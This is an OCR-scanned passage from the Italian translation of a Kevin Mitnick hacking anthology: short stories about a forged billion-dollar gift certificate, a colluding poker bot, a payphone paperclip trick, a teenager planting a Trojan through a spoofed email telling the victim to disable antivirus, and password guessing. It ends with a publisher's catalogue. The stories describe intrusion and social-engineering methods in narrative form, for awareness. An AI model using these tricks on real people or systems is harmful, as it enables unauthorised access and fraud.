americani di individuare esattamente la sua posizione. Nelle- 
stremo tentativo di salvarsi la vita, alcune unità irachene disabi- 
litarono quanto rimaneva dei loro strumenti di comunicazione 
per non dover ricevere trasmissioni. 
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“In rapida successione,” ricorda Mike con spensierata alle- 
gria, “l’esercito iracheno sprofondò in molti punti nel caos e nel- 
l’inattività perché nessuno poteva — o voleva — comunicare.” 


Il buono regalo da un miliardo di dollari 


Il racconto che segue è in buona parte tratto direttamente dal- 
la conversazione che abbiamo avuto con questo ex hacker, che 
oggi è un consulente per la sicurezza rispettato e di successo: 


La questione è tutta qui, amico, tutta qui. “Perché rapina le banche, 
signor Horton?” “Perché è lì che tengono il denaro.” 

Vi racconterò una storia divertente. Io e questo tipo, Frank, della 
National Security Agency - non ho intenzione di dire il suo nome, 
adesso lavora per la Microsoft — eravamo stati ingaggiati [per un pe- 
netration test] da un'azienda che rilasciava certificati di buoni re- 
galo digitali. Hanno chiuso, ma non voglio comunque dire il loro 
nome. 

Allora che cosa andiamo ad hackerare? Hackeriamo la crittografia 
del buono regalo? No, la codificazione era assai buona, molto ben 
fatta. Era sicura dal punto di vista crittografico, provarci sarebbe 
stata una perdita di tempo. Quindi dove li attacchiamo? 

Ci informiamo su come un commerciante riscatta un buono. Per 
farlo, conduciamo un attacco dall'interno: ci fu permesso infatti di 
avere un account da negoziante. Bene, troviamo una falla nel siste- 
ma di conversione, un buco nell'applicazione che ci permette di ese- 
guire liberamente i comandi sulla macchina. Fu una bazzecola, una 
cosa da bambini: devi solo sapere quello che si sta cercando. Non 
sono un esperto di crittografia e nemmeno un matematico. Sempli- 
cemente so come le persone commettono degli errori nelle applica- 
zioni e che ripetono gli stessi errori in continuazione. 

Nella stessa sottorete (subnet) del centro di conversione dei buoni 
avevano attivato una connessione alla loro zecca, cioè al computer 
che emette il buono regalo. Entrammo in quella macchina usando 
un rapporto di fiducia. Invece di ottenere semplicemente una fine- 
stra per digitare i comandi come root, facemmo proprio un buono 
regalo: emettemmo un buono con 32 high bit4 e usammo i dollari 
come valuta. 

A quel punto avevamo un buono regalo del valore di un miliardo e 
novecento milioni di dollari e il buono era assolutamente valido. 
Qualcuno disse che avremmo dovuto usare le sterline inglesi, che ci 
avrebbero dato un rendimento ancora più alto. 

Poi andammo sul sito di Gap e comprammo un paio di calzini. Teo- 
ricamente dovevamo avere un miliardo e novecento milioni di resto 
per un paio di calzini. Era fantastico. 


4 L'high bit o meta bit, è, secondo la definizione del Jargon File di Eric S. 
Raymond, “il bit più significativo in un byte” o “il bit più alto in un carattere a 8- 
bit, che ricade tra il carattere 128 e il 255”. [N.d.T] 
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Volevo pinzare i calzini sul rapporto del penetration test nel sistema. 


Ma non era finita. Non gli piaceva l'impressione che, secon- 
do lui, ci aveva dato con questa storia e quindi continuò: 


Forse vi sarò sembrato una specie di rockstar, ma tutto quello che 
vedete non è che il percorso logico che ho seguito. Voi adesso dire- 
te: “Oh, santo cielo, quant'è intelligente. È entrato in quella mac- 
china, poi da lì ha violato una relazione di fiducia e poi è entrato nel 
computer della zecca e ha falsificato un buono regalo”. 

Sì, ma vi rendete conto di quanto è stato difficile? Della serie: “Pro- 
va questo. Funziona?”. No. “Allora prova quest'altro. Funziona?” No. 
Provi e sbagli, riprovi e risbagli. Ci vogliono curiosità, perseveran- 
za e la cieca fortuna. E mettici anche un po’ di bravura. 

E comunque ce li ho ancora quei calzini. 


L'hack al Texas Hold ‘Em’ 


Una delle cose di cui un giocatore di poker si sente assai si- 
curo quando è al tavolo di un grande casinò — che giochi alla ver- 
sione attualmente più in voga, il Texas Hold ‘Em, o a qualche al- 
tra variante — è che può davvero contare sulle proprie capacità e 
sulla fortuna. Sotto gli occhi attenti del croupier, dei responsa- 
bili di sala e sotto lo sguardo onnipresente delle telecamere, non 
c'è molto da preoccuparsi che gli altri giocatori stiano barando. 

Di questi tempi, grazie a Internet, è possibile sedersi a un ta- 
volo da poker virtuale, giocando comodamente attraverso il vo- 
stro computer, con soldi veri e in tempo reale contro giocatori in 
varie parti del mondo. 

Finché non arriva un hacker che trova il modo per assicurarsi 
un vantaggio non da poco utilizzando un bot fatto in casa, vale a 
dire un robot, in questo caso interamente elettronico. L'hacker, di 
nome Ron, dice che ciò comportò “scrivere un bot che giocasse a 
poker online in modo ‘matematicamente perfetto’, inducendo gli 
avversari a credere di avere di fronte un vero giocatore umano”. 
Oltre a fare soldi con le partite quotidiane, Ron inserì il bot in un 
buon numero di tornei con risultati stupefacenti: “In un torneo 
free-roll (senza tassa di iscrizione) della durata di quattro ore, che 
iniziò con trecento giocatori, il bot terminò al secondo posto”. 

Le cose stavano andando alla grande finché Ron commise un 
errore di valutazione: decise di mettere in vendita il bot, a no- 
vantanove dollari l’anno per ogni acquirente. Si cominciò a sen- 
tir parlare del prodotto e alcune persone che giocavano sul sito 


5 La più popolare variante americana del poker, giocata nei casinò degli sta- 
ti dell'Ovest. [N.d.7.] 
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di poker che Ron aveva preso di mira iniziarono a preoccuparsi 
del rischio di giocare contro dei robot. “Provocai un tale clamo- 
re — e una tale preoccupazione da parte dei gestori del casinò di. 
perdere i loro clienti - che sul sito aggiunsero un codice per rile- 
vare l’uso del mio bot, dicendo che avrebbero squalificato per- 
manentemente chiunque fosse stato beccato a farne uso.” 

Era venuto il momento di un cambio di strategia: 


Dopo aver tentato senza fortuna di fare soldi dalla vendita della tec- 
nologia stessa, decisi di rendere segreto tutto il progetto. Modificai 
il bot per poter giocare in uno dei più grandi siti di poker e ne este- 
si le capacità tecnologiche in modo che potesse giocare in “moda- 
lità di squadra”, in cui due o più bot allo stesso tavolo si mostrasse- 
ro le carte, avvantaggiandosi lun l’altro in modo scorretto. 


Nella sua e-mail originale su questa sua avventura, Ron la- 
sciava intendere che i suoi bot erano ancora in uso. In seguito 
scrisse di nuovo per chiederci di spiegare che: 


Dopo aver valutato il danno economico che avrebbe provocato a mi- 
gliaia di giocatori di poker online, alla fine decisi di non usare più 
questa tecnologia contro altre persone. 


Comunque, appassionati dei giochi d'azzardo online, dovete de- 
cidere da soli. Se Ron Fha fatto, lo possono fare anche gli altri. For- 
se fareste meglio a saltare subito su un volo per Las Vegas. 


Il giovane cacciatore di pedofili 


Simon e io troviamo questa storia avvincente. Anche se può 
darsi che sia solo parzialmente vera o, da quel che ne sappiamo, 
anche completamente inventata, abbiamo deciso di condivider- 
la con voi così come ci è stata inviata: 


Tutto cominciò quando avevo quindici anni circa. Un mio amico, 
Adam, mi mostrò come telefonare gratuitamente dal telefono pub- 
blico della scuola. Era la prima volta che facevo qualcosa di lonta- 
namente illegale. Adam trasformò una graffetta di metallo in una 
specie di scheda telefonica gratuita, usando la graffetta per punzo- 
nare l'auricolare della cornetta. Poi componeva il numero che vole- 
va chiamare, tenendo premuta l’ultima cifra del numero e toccan- 
do allo stesso tempo con la graffetta il microfono della cornetta. Quel 
che ne seguiva era una serie di clic e poi il suono della chiamata. 
Ero senza parole. Era la prima volta in vita mia che mi rendevo con- 
to della potenza che può avere la conoscenza. 

Cominciai immediatamente a leggere tutto quello su cui potevo met- 
tere le mani. Se erano informazioni sospette, dovevo averle. Usai il 


286 


trucco della graffetta durante tutti gli anni delle superiori, finché 
non arrivò il desiderio di imboccare strade ancora più oscure. O for- 
se era solo per vedere fino a dove mi poteva condurre questa nuova 
strada appena scoperta. Se lo sommate al brivido di fare qualcosa 
di “proibito”, capirete che tutto questo era sufficiente a condurre un 
ragazzino di quindici anni nel mondo sotterraneo dell’illegalità. 

Il passo successivo fu rendermi conto che ci voleva più della sem- 
plice conoscenza per essere un hacker. Ci voleva una certa astuzia 
sociale per mettere in funzione la trappola. 

Venni a sapere di questi programmi chiamati Trojan tramite un ami- 
co online che me ne aveva fatto installare uno sul mio computer. Po- 
teva fare cose incredibili come vedere quello che stavo digitando, re- 
gistrare le immagini della mia videocamera e un'infinità di altre co- 
se curiose. Ero in estasi. Cercai tutto quello che potevo su questi 
Trojan e cominciai a inserirli dentro file eseguibili conosciuti. An- 
davo nelle chat e cercavo di fare in modo che qualcuno lo scaricas- 
se, ma il problema era la fiducia. Nessuno si fidava di me, e non a 
torto. 

Entrai in una chat Irc per ragazzi scelta a caso e fu lì che lo incon- 
trai: un pedofilo in cerca di immagini di bambini e ragazzini. Ali- 
nizio pensai fosse uno scherzo, ma decisi di stare al gioco e vedere 
se potevo far di questa persona la mia vittima. 

Cominciai a chattare con lui fingendo di essere una ragazzina con 
tutta intenzione di incontrarlo un giorno, ma non nel modo in cui 
lui pensava. Quest'uomo era a dir poco malato. I miei istinti di quin- 
dicenne volevano far giustizia. Volevo fargli talmente male, che do- 
po ci avrebbe pensato due volte prima di andare a caccia di ragaz- 
zini. Cercai in varie occasioni di mandargli il Trojan, ma era più sve- 
glio di me. Aveva un antivirus che bloccava tutti i miei tentativi. La 
cosa divertente fu che non sospettò mai che potessi avere cattive in- 
tenzioni. Pensava che dovevo avere il computer infetto e che il virus 
si attaccasse da solo alle immagini che gli cercavo di spedire. Io sem- 
plicemente facevo il finto tonto. 

Dopo qualche giorno di chiacchiere, cominciò a farsi più insisten- 
te. Voleva mie immagini spinte: mi disse che mi amava e che vole- 
va incontrarmi. Era uno stronzo di prima categoria e proprio il ber- 
saglio perfetto da punire senza rimorso se fossi riuscito a entrare 
nel suo computer. Avevo messo insieme abbastanza informazioni su 
di lui per ottenere accesso ad alcune delle sue caselle di posta. Ave- 
te presente quelle domande segrete che vi chiedono del tipo: “Qual 
è il tuo colore preferito?”, “Qual è il cognome da nubile di vostra ma- 
dre?”. Tutto quello che feci fu fargli spifferare queste informazioni 
e voilà, ero dentro. 

La roba che aveva era altamente illegale. Diciamo solo che era un 
sacco di pornografia con bambini di varie età. Ero nauseato. 

Poi mi venne l’illuminazione. Se non accettava il Trojan da me, for- 
se l'avrebbe accettato da uno dei suoi compari del porno. Falsificai 
un indirizzo e-mail e gli scrissi un breve messaggio: 

Dai un'occhiata a questo video bollente. Disabilita l'antivirus prima 
di scaricarlo perché ne incasina la qualità. P.s.: sono in tuo potere. 
Ero sicuro che non ci sarebbe cascato e aspettai pazientemente tut- 
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to il pomeriggio che scaricasse la posta. Avevo già gettato la spugna. 
Non ero portato {per l'ingegneria sociale]. 

Poi verso le undici di sera successe quello che speravo. Ricevetti il 
messaggio dal mio Trojan che mi diceva che l'aveva installato sulla 
sua macchina. Ce l'avevo fatta! 

Ottenni l’accesso e immediatamente cominciai a copiare le prove in 
una cartella [che avevo creato sul suo computer]. La chiamai “jail- 
bait”. Venni a sapere ogni tipo di informazioni su questo tizio. No- 
me, indirizzo, dove lavorava e addirittura su quali documenti stava 
lavorando in quel periodo. 

Non potevo chiamare il Fbi o la polizia locale perché temevo che la 
sola conoscenza del contenuto del computer di quell'uomo mi avreb- 
be portato dritto in galera, e avevo paura. Curiosando e provocan- 
dolo un po’ venni a sapere che era sposato e che aveva dei figli. Era 
orribile. 

Feci l’unica cosa che sapevo fare. Mandai a sua moglie un'e-mail con 
tutte le informazioni di cui aveva bisogno per accedere al file “jail- 
bait”. Poi cancellai le tracce e disattivai il Trojan. 

Questo fu il mio primo tentativo di sfruttare non solo il codice, ma 
anche le emozioni per ottenere qualcosa. Una volta sperimentato, 
mi resi conto che non era esattamente quello che mi aspettavo. Ri- 
chiedeva di più della pura conoscenza, richiedeva astuzia, bugie, in- 
ganno e duro lavoro. Ma valse la pena spendere ogni grammo di 
energia per dare una lezione a quello stronzo. Avevo quindici anni 
e mi sentivo come un re. E non potevo dirlo a nessuno. 

Ma non avrei mai voluto vedere le cose che vidi. 


..E non c'è nemmeno bisogno di essere un hacker. 

Dalle storie di questo libro emerge chiaramente che la maggior 
parte degli hacker impiega anni a sviluppare il proprio sapere. È 
per questo che mi sembra sempre straordinario quando mi im- 
batto in un exploit che ha richiesto una mentalità da hacker, mes- 
sa però in atto da persone prive di un background da hacker. La 
storia che segue è una di queste. 

All'epoca del fatto, John era uno studente agli ultimi anni del 
college, che si stava laureando in informatica. Trovò un posto co- 
me stagista nell'azienda locale della luce e del gas: così, al mo- 
mento della laurea, non avrebbe avuto solo un titolo di studio ma 
anche un'esperienza lavorativa. L'azienda lo mise al lavoro sul- 
l'aggiornamento del Lotus Notes dei dipendenti. Ogni volta che 
chiamava qualcuno per fissare un appuntamento, gli chiedeva la 
password per Lotus Notes in modo da poter effettuare l’aggior- 
namento. Le persone non esitavano a dargliela. 

Tuttavia, a volte si ritrovava a parlare con la segreteria te- 


é Una persona minorenne con la quale avere un rapporto sessuale può co- 
stituire uno stupro in base alla legge. [N.d.7.] 
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lefonica e a fissare un appuntamento ma senza la possibilità di 
chiedere preventivamente la password. Sapeva a cosa andava in- 
contro e quindi le password se le trovava da solo: “Scoprii che 
F80 percento delle persone non aveva mai cambiato la password 
da quando Notes era stato installato sul loro sistema, quindi il 
mio primo tentativo era ‘pass’. 

Se non funzionava, John raggiungeva il cubicolo della per- 
sona in questione e dava un'occhiata per vedere se c'era un bi- 
glietto adesivo con tutte le password, che di solito era attaccato 
in bella vista sullo schermo oppure nascosto (ammesso che sia la 
parola giusta) sotto la tastiera o nel primo cassetto. 

E se anche dopo questo tentativo rimaneva a mani vuote, ave- 
va un'ultima carta da giocare: “La mia ultima strategia di attacco 
era studiare gli oggetti personali nel loro cubicolo. Qualsiasi cosa 
che mi desse un indizio per nomi di figli, animali, hobby e cose del 
genere”. Il più delle volte bastavano solo alcuni tentativi. 

Una volta tuttavia fu più difficile del solito. “Ricordo ancora 
la password di una donna che mi stava rendendo la vita difficile, 
finché non notai che in tutte le sue foto c'era una moto.” A istin- 
to provò “harley”... e funzionò. 

Solleticato dal successo cominciò a tenere un registro: “Lo 
trasformai in un gioco, entrai in più del 90 percento dei casi, im- 
piegandoci ogni volta meno di dieci minuti. Le password che riu- 
scivano a eludere i miei tentativi in genere si rivelavano sempli- 
ci informazioni che avrei potuto scoprire con ricerche più ap- 
profondite, molto spesso erano date di nascita dei figli”. 

Alla fine, lo stage risultò assai utile, perché “non solo mi fornì 
degli elementi per il mio curriculum, ma mi insegnò anche che 
la nostra prima linea di difesa contro gli hacker è anche la più 
debole: gli utenti stessi e le password che scelgono”. 

Mi sembra un messaggio importante con cui concludere. Se 
ogni utente migliorasse questa sera stessa le proprie password — 
e non lasciasse le nuove password in qualche posto facile da tro- 
vare — domani mattina ci troveremmo a vivere in un mondo mol- 
to più sicuro. 

Noi speriamo che questo messaggio si traduca in azione per 
ogni lettore di questo libro. 
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conservi certe credenziali, p. 224; Difendersi a fondo, p. 224; Con- 
clusioni, p. 225. 


9. Sul continente 


Da qualche parte a Londra, p. 227; Tuffarsi, p. 228; Mappare la 
rete, p. 229; Identificare un router, p. 230; Il secondo giorno, p. 
231; Esaminando la configurazione dell'apparecchio 3Com, p. 
233; Il terzo giorno, p. 234; Alcuni pensieri sul cosiddetto “in- 
tuito dell’hacker”, p. 238; Il quarto giorno, p. 239; L'accesso al si- 
stema della compagnia, p. 243; Obiettivo raggiunto, p. 246; Ri- 
flessioni, p. 247; Contromisure, p. 247; Soluzioni temporanee, p. 
248; Usare le porte alte, p. 248; Le password, p. 248; Mettere in 
sicurezza i portatili del personale, p. 249; Autenticazione, p. 249; 
Filtrare i servizi non necessari, p. 250; Hardening, p. 250; Con- 
clusioni, p. 250. 


10. Gli ingegneri sociali: come si comportano e come fer- 
marli 


Un ingegnere sociale al lavoro, p. 253; Riflessioni, p. 263; Le ve- 
stigia dei ruoli, p. 263; La credibilità, p. 264; Costringere l'o- 
biettivo a un ruolo (altercasting), p. 265; Distrarre dal pensiero 
sistematico, p. 266; Il momento dell'accondiscendenza, p. 267; 
Il desiderio di aiutare, p. 267; L'attribuzione, p. 268; Piacere, p. 
268; Paura, p. 269; La reattanza, p. 269; Contromisure, p. 270; 
Linee guida per la formazione, p. 271; Programmi di contrasto 
al social engineering, p. 272; Una nota più leggera: incontrate i 
manipolatori nella vostra famiglia, i vostri figli, p. 275; Conclu- 
sioni, p. 277. 


11. Storie brevi 


L'assegno mancante, p. 278; Vieni a Hollywood, giovane mago, 
p. 279; Hackerare un distributore di bibite, p. 280; Mettere in 
ginocchio l’esercito iracheno durante l'operazione “Desert 
Storm”, p. 281; Il buono regalo da un miliardo di dollari, p. 284; 
L'hack al Texas Hold ‘Em, p. 285; Il giovane cacciatore di pedo- 
fili, p. 286. 
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Mariateresa Aliprandi, Eugenia Pelanda, Tommaso Senise, Psicote- 
rapia breve di individuazione. La metodologia di Tommaso Se- 
nise nella consultazione con l’adolescente 


Hannah Arendt, Antologia. Pensiero, azione e critica nell’epoca dei 
totalitarismi. A cura di P. Costa 


Hannah Arendt, La banalità del male. Eichmann a Gerusalemme 
Hannah Arendt, Ebraismo e modernità 


Erich Auerbach, Lingua letteraria e pubblico nella tarda antichità la- 
tina e nel Medioevo 


Erich Auerbach, Studi su Dante. Prefazione di D. Della Terza 
Michail A. Bakunin, Stato e anarchia. Introduzione di M. Maggiani 
Kevin Bales, I nuovi schiavi. La merce umana nell’economia globale 


Nanni Balestrini, Primo Moroni, L’orda d’oro. 1968-1977. La gran- 
de ondata rivoluzionaria e creativa, politica ed esistenziale. Nuo- 
va edizione a cura di S. Bianchi 


William J. Barber, Storia del pensiero economico 
Renato Barilli, Larte contemporanea. Nuova edizione 


Renato Barilli, Informale Oggetto Comportamento. I. La ricerca ar- 
tistica negli anni °50 e ’60 


Renato Barilli, Informale Oggetto Comportamento. II. La ricerca ar- 
tistica negli anni 70 


Renato Barilli, Prima e dopo il 2000. La ricerca artistica 1970-2005 


Teodolinda Barolini, La “Commedia” senza Dio. Dante e la creazio- 
ne di una realtà virtuale 


Karl Barth, L’Epistola ai Romani. Cura di G. Miegge 


Stefano Bartolini, Manifesto per la felicità. Come passare dalla so- 
cietà del ben-avere a quella del ben-essere 


Jean Baudrillard, Lo scambio simbolico e la morte 

Jean Baudrillard, Le strategie fatali 

Zygmunt Bauman, Le sfide dell’etica 

Zygmunt Bauman, La solitudine del cittadino globale 

Henri Bergson, // riso. Saggio sul significato del comico 

Isaiah Berlin, Libertà. A cura di H. Hardy. Con un saggio di I. 
Harris su Berlin e i suoi critici. Edizione italiana a cura di M. 
Ricciardi 

Ernst Bloch, Ateismo nel cristianesimo. Per la religione dell’Esodo 
e del Regno. “Chi vede me vede il Padre” 

Ernst Bloch, Thomas Münzer teologo della rivoluzione 

Gianluca Bocchi, Mauro Ceruti, Origini di storie 


Remo Bodei, Destini personali. L'età della colonizzazione delle 
coscienze 


Remo Bodei, Geometria delle passioni. Paura, speranza, felicità: fi- 
losofia e uso politico 


Eugenio Borgna, Core se finisse il mondo. Il senso dell’esperienza 
schizofrenica 


Eugenio Borgna, Le emozioni ferite 
Eugenio Borgna, Le figure dell'ansia 
Eugenio Borgna, Le intermittenze del cuore 
Eugenio Borgna, Malinconia 


Eugenio Borgna, Noi siamo un colloquio. Gli orizzonti della cono- 
scenza e della cura in psichiatria 


Eugenio Borgna, La solitudine dell'anima 

Pierre Bourdieu, I dominio maschile 

Jeremy Brecher, Tim Costello, Contro il capitale globale. Strategie 
di resistenza. A cura di L. Piccioni 

Jerome Fase La cultura dell educazione. Nuovi orizzonti per la 
scuola 


Giorgio Candeloro, Storia dell’Italia moderna 


Eva Cantarella, Lambiguo malanno. Condizione e immagine della 
donna nell’antichità greca e romana 


Eva Cantarella, Itaca. Eroi, donne, potere tra vendetta e diritto 
Eva Cantarella, Passato prossimo. Donne romane da Tacita a Sulpicia 


Eva Cantarella, I supplizi capitali. Origini e funzioni delle pene di 
morte in Grecia e nell’antica Roma. Nuova edizione rivista 


Fritjof Capra, Il punto di svolta. Scienza, società e cultura emergente 
Fritjof Capra, Verso una nuova saggezza 

Giampiero Carocci, Storia d’Italia dall Unità ad oggi 

Rachel Carson, Primavera silenziosa. Introduzione di Al Gore 


Gino Castaldo, La Terra Promessa. Quarant'anni di cultura rock 
(1954-1994) 


Manuel Castells, Galassia Internet 
Carlo M. Cipolla, Uomini, tecniche, economie 
Gherardo Colombo, Sulle regole 


Alessandro Dal Lago, Non-persone. L'esclusione dei migranti in una 
società globale. Nuova edizione 


Gilles Deleuze, Logica del senso 
Ernesto de Martino, Sud e magia. Introduzione di U. Galimberti 
Mario De Micheli, L'arte sotto le dittature 


Mario De Micheli, Le avanguardie artistiche del Novecento (nuova 
edizione ampliata) 

Mario De Micheli, Le poetiche. David, Delacroix, Courbet, Cézanne, 
Van Gogh, Picasso. Antologia degli scritti 


Marco d’Eramo, I/ maiale e il grattacielo. Chicago: una storia del 
nostro futuro. Prefazione di M. Davis. Nuova edizione 

Ilvo Diamanti, Si/labario dei tempi tristi. Nuova edizione aggiorna- 
ta e ampliata 

Gillo Dorfles, Ultime tendenze nell'arte d'oggi. Dall’Informale al 
Neo-oggettuale. Nuova edizione aggiornata e ampliata 

Barbara Ehrenreich, Una paga da fame. Come (non) si arriva a fine 
mese nel paese più ricco del mondo 


Paul K. Feyerabend, Contro il metodo. Abbozzo di una teoria anar- 
chica della conoscenza. Prefazione di G. Giorello 


Michel Foucault, GX anormali. Corso al Collège de France (1974- 
1975) 


Michel Foucault, Antologia. L'impazienza della libertà. A cura di V. 
Sorrentino 


Michel Foucault, “Bisogna difendere la società” 


Michel Foucault, L’erzeneutica del soggetto. Corso al Collège de 
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tica filosofica. Opere XVI 
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Umberto Galimberti, I miti del nostro tempo. Opere XIX 
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. V secolo. Edizione aggiornata 


Francesco Gesualdi, Manuale per un consumo responsabile. Dal boi- 
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Stephen Jay Gould, Bravo Brontosauro. Riflessioni di storia naturale 


Stephen Jay Gould, Quando i cavalli avevano le dita. Misteri e stra- 
nezze della natura 


Stephen Jay Gould, Risplendi grande lucciola. Riflessioni di storia 
naturale 


Stephen Jay Gould, La vita meravigliosa 


Vittorio Gregotti, Il territorio dell’architettura. Nuova edizione. Pre- 
fazione di U. Eco 


Gulag. Storia e memoria. A cura di E. Dundovich, F. Gori, E. Guer- 
cetti 


Jürgen Habermas, L'inclusione dell'altro. Studi di teoria politica 
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conoscimento 
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Pekka Himanen, L'etica hacker e lo spirito dell'età dell informazio- 
ne. Prologo di L. Torvalds. Epilogo di M. Castells 


Albert O. Hirschman, Le passioni e gli interessi. Argomenti politi- 
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Luce Irigaray, Speculum. L'altra donna 


Roman Jakobson, Saggi di linguistica generale. Cura e introduzione 
di L. Heilmann 


Furio Jesi, Germania segreta. Miti nella cultura tedesca del ‘900 
Ryszard Kapuściński, L'altro 
Wolfgang Köhler, Psicologia della Gestalt 


Jan Kott, Shakespeare nostro contemporaneo. Prefazione di M. Praz 


Francesco La Licata, Massimo Ciancimino, Don Vito. Le relazioni 
segrete tra Stato e mafia nel racconto di un testimone d’ecce- 
zione. Con la testimonianza di Giovanni Ciancimino 


Ronald D. Laing, La politica dell'esperienza e L'uccello del paradiso 


Christopher Lasch, L'îo minimo. La mentalità della sopravvivenza 
in un’epoca di turbamenti 


Christopher Lasch, La ribellione delle élite. Il tradimento della 
democrazia 


Serge Latouche, La scommessa della decrescita 


Gad Lerner, Operai. Viaggio all’interno della Fiat. La vita, le case, 
le fabbriche di una classe che non c’è più. Nuova edizione 


Claude Lévi-Strauss, Le strutture elementari della parentela. A cura 
di A.M. Cirese 


Claude Lévi-Strauss, I totemismo oggi 

Pierre Lévy, L'intelligenza collettiva. Per un’antropologia del cyber- 
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Agostino Lombardo, Lettura del Macbeth. A cura di R. Colombo 

Alexander Lowen, Arzore e orgasmo 

Alexander Lowen, Bioenergetica 
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Tomás Maldonado, Arte e artefatti. Intervista di Hans Ulrich Obrist 

Tomás Maldonado, Disegno industriale: un riesame 

Tomás Maldonado, Reale e virtuale. Nuova edizione 

Carlo Maria Martini, Verso Gerusalemme 

Wynton Marsalis, Come il jazz può cambiarti la vita 


Karl Marx, Antologia. Capitalismo, istruzioni per l’uso. A cura di 
E. Donaggio e P. Kammerer 


Richard Middleton, Studiare la popular music. Introduzione di F, 
Fabbri 
Kevin D. Mitnick, L'arte dell'inganno. I consigli dell’hacker più fa- 


moso del mondo. Scritto con W.L. Simon. Introduzione di S. 
Wozniak 


Edgar Morin, I/ paradigma perduto. Che cos'è la natura umana? 
Massimo Mucchetti, Licenziare i padroni? Edizione ampliata 
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Antonio Prete, I/ pensiero poetante. Saggio su Leopardi. Edizione 
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La questione settentrionale. Economia e società in trasformazione. 
A cura di G. Berta 


Quindici. Una rivista e il Sessantotto. A cura di N. Balestrini. Con 
un saggio di A. Cortellessa 


Ahmed Rashid, Talebani. Islam, petrolio e il Grande scontro in Asia 
centrale. Nuova edizione ampliata e aggiornata 


John Rawls, Lezioni di storia della filosofia politica. A cura di S. Free- 
man. Nota all’edizione italiana di S. Veca 


John Rawls, Una teoria della giustizia. Edizione aggiornata 


Ermanno Rea, La fabbrica dell’obbedienza. Il lato oscuro e compli- 
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Franco Rella, L'enigma della bellezza 
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